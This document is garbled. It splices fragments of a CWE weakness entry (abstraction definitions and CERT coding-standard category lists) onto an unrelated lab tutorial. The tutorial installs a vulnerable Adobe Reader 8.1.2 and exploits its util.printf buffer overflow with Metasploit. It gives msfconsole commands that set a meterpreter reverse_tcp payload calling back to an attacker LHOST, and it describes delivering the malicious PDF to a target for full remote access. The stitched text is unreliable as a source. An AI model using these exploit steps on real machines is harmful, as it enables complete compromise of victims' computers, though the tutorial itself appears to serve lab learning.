Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.

That is linked to a certain type of product, typically involving a specific language or technology. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource.

Use of Path Manipulation Function without Maximum-sized Buffer

This table shows the weaknesses and high level categories that are related to this weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to similar items that may exist at higher and lower levels of abstraction. In addition, relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user may want to explore.

Category - a CWE entry that contains a set of other entries that share a common characteristic.

CERT C Secure Coding Standard (2008) Chapter 5 - Integers (INT)
CERT C Secure Coding Standard (2008) Chapter 10 - Input Output (FIO)
CERT C Secure Coding Standard (2008) Chapter 13 - Error Handling (ERR)
CERT C++ Secure Coding Section 04 - Integers (INT)
CERT C++ Secure Coding Section 09 - Input Output (FIO)

View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).

SFP Secondary Cluster: Use of an Improper API
SEI CERT C Coding Standard - Guidelines 07.
SEI CERT C Coding Standard - Guidelines 10.
SEI CERT C Coding Standard - Guidelines 12.
SEI CERT C Coding Standard - Guidelines 14.
SEI CERT C Coding Standard - Guidelines 48. Miscellaneous (MSC)

The old version of PDF Reader can be found on various web pages, but the most prominent web page is definitely oldapps. We need to search for a specific version of Adobe PDF Reader, which was vulnerable to the util.printf() buffer overflow vulnerability. Luckily the exploit for the util.printf() buffer overflow vulnerability can be found in the Metasploit modules as we can see in the picture below:

But which version do we need? The vulnerable version of Adobe PDF Reader is 8.1.2 (including), which we need to download from the oldapps web page and install on the system. The installation process of the old vulnerable PDF Reader can be observed below:

When the installation process is complete, we can check whether the appropriate version was installed on the system. To do that, we can start the Adobe PDF Reader normally and click on Menu – Help – About Adobe Reader 8. The right version of Adobe Reader is installed, which is the version 8.1.2.

Now we’ve come to the part where we need to test the Metasploit module. In order to do that we must download the Metasploit, start the msfconsole, and execute the commands below:

    msf > use exploit/windows/browser/adobe_utilprintf
    msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp
    msf exploit(adobe_utilprintf) > set LHOST 192.168.1.134
    Started reverse handler on 192.168.1.134:4444

First we’re executing the command to use the adobe_utilprintf exploit. Then we’re setting some common Metasploit variables that are required for everything to work. These variables are PAYLOAD, which specifies the payload that will be executed upon successful execution of the exploit, and LHOST, which sets the IP of our meterpreter computer. This IP will be used by the payload to connect back to us, creating a reverse meterpreter session, which will give us complete access to the compromised computer. At the end we’re executing the command exploit to run the configured actions.

We can download the generated malicious PDF from the URI and save it on our hard drive as util_printf.pdf. Then we need to copy it to the target machine (the one running the vulnerable version of Adobe PDF Reader) and open it.